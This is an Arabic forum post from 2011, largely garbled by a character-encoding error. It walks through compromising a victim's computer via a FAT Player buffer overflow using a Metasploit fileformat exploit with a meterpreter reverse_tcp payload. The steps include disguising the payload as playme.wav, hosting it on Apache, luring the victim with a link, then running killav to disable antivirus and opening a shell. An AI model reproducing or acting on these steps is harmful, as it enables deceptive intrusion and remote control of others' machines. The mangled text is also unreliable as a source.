åÏå ØÑíÞÉ áÅÎÊÑÇÞ ÇáÍæÇÓíÈ Úä ØÑíÞ ÊÑÛÑÉ Çá Buffer overviewÇáãÊæÇÌÏÉ Ýí Çá
FAT player
áÑÄíÉ ÇáÔÑÍ ÈÇáÕæÑÉ æ ÇáÕæÊ ãÈÇÔÑÉ åäÇ
http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533
ááÊÍãíá ÇáÔÑÍ åäÇ
http://blip.tv/file/get/Jac0bn3t-met...verview350.mp4
ßä ÓÎíÇ æ Å ÞÑà åÏÇ ÇáãæÖæÚ
ãÇ ÞãÊ ÈÇÓÊÎÏÇãå :
Metasploit
OS:backtrack 5 and Win SP3
Camtasia studio recorder and editor
Fat player
ÇáÔÑÍ:
ÞãÊ ÈÅÚÏÇÏ PAYLOAD
Úáì ÕíÛÉ .WAV
exploit:windows/fileformat/fatplayer_wav
PAYLOAD :windows/meterpreter/reverse_tcp
ßíÝ ÞãäÇ ÈÕäÚ Çá PAYLOAD
ÇáÔÑÍ Ýí ÇáÝíÏíæ ãä ÇáÏÞíÞÉ 1:00 Åáì 2:15
Êã æÖÚäÇåÇ Ãì Çá PAYLOADÝí /root/backdoor.wav
ÍãáäÇ FATPLAYER 0.6bÇáãÊÛæÑÉ ÈÇá Buffer Overview
ææÖÚäÇåÇ ÃíÖÇ Ýí Çá /root/fatplayer_win32
ÈÚÏ ÏÇáß ÞãäÇ ÈÊÛíÑ ÃÓãÇÁ
FAYplayer_win32=====>fatplayer.exe
backdoor.wav=======>playme.wav
ÍæáäÇåã ãä / rootÅáì /var/www
ÓæÝ ÊÊÓÃáæä áãÇÏÇ Çáì /var/www
áßí ÊÕÈÍ ÞÇÈáÉ ááÊÍãíá ãä Çí ÍÇÓæÈ
ÈÚÏ ÝÊÍ Çá ÈæÑÊ 80 Úä ÊØÑíÞ Çá
service apache2 start
ÇÑÓáÊ ááÖÍíÉ ÑÓÇáÉ ÝíåÇ ÑÇÈØ
168.192.*.*/fatplayer.exe
æ
168.192.*.*/playme.wav
ÈÚÏ ÞÑÇÁÉ ÇáÖÍíÉ ááÑÓÇáÉ æ ÊÍãíá fatplayer.exe and playme.wav
æ ÊÔÚíá ÇáãæÓíÞÇ ÓæÝ ÇÍÕá Úáì meterpreter
æ ÓÃÈÏÃ ÈÈÚÖ Meterpreter scripting
run checkvm ááãÚÑÝÉ åá åæ System æåãí
run killavááÞÊá Úãá Çá antivirus
Êã shell-i ááÍÕæá Úáì CMD or bash
ÇáãæÓíÞÇ :savage garder
animal song
santa monica
07-15-2011, 03:26 PM
ÅÎÊÑÇÞ ãÓÊÚãá ÇáÇäÊÑäÊ (fatplayer)
ÇáÚÑÖ ÇáÔÌÑí